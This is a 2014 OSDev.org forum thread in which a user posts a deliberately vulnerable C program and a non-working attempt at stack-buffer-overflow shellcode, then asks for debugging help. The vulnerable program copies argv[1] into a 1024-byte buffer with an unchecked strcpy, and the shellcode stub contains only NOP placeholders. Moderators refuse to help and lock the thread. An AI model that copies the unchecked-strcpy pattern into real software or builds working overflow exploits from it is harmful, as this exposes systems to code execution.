OSDev.org

The Place to Start for Operating System Developers
https://f.osdev.org/

modify the return address to shellcode

https://f.osdev.org/viewtopic.php?t=28653

Page 1 of 1

modify the return address to shellcode

Posted: Tue Oct 21, 2014 2:05 pm
by hadi
i have tow C program. one is shellcode and the other vulnerable program.

i want to change the return address with out buffering the vulnerable program.

like for example:-
__asm__("movl $shellcode, 4(%ebp)");
but this method doesn't work for me, i have tried running the vulnerable program in linux with gdb and redirect shellcode to it (gdb) run vuln < shellcode but eip or ebp never change. can someone look at my shellcode program and see where's the error is.

shellcode program

Code: Select all

#include <stdio.h>
#include <stdlib.h>

void shellcode() {
__asm__(".byte 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90"); /* you may put your shellcode here */
printf("hey guyz!\n");
exit(0);
}

void bang(int val) {

__asm__("movl $shellcode, 4(%ebp)");

}

int main() {
bang(0);
}
vulnerable program

Code: Select all

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *string) {

char buffer[1024];

strcpy(buffer, string);

return 1;
}

int main(int argc, char *argv[]) {

bof(argv[1]);
printf("Done..\n");

return 1;
}

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:16 pm
by Brynet-Inc
You asked this once before and the topic was locked.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:20 pm
by hadi
Hi Brynet-Inc,

i asked with different method and different code. theses new.
if you have answer please share with me.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:41 pm
by martinFTW
BTW I exploited sortie's dummy program and it really wasn't that hard.

Re: modify the return address to shellcode

Posted: Tue Oct 21, 2014 3:42 pm
by sortie
This is not the forum for you.

Your endeavours doesn't seem linked to hobbyist operating systems development (osdev). I recommend you find another forum.

Additionally, you don't speak English well. Your post makes no sense. Improve your English. Follow your guide, I assume you have one.

I believe your problem is that you don't understand what the ELF file format is, you are piping a ELF program into the vulnerable program. This isn't how things work. You completely didn't understand your guide.

I'm happy to discuss these security matters intelligently. I don't want to answer your impossible-to-answer questions.

As last time, locked.
All times are UTC-06:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited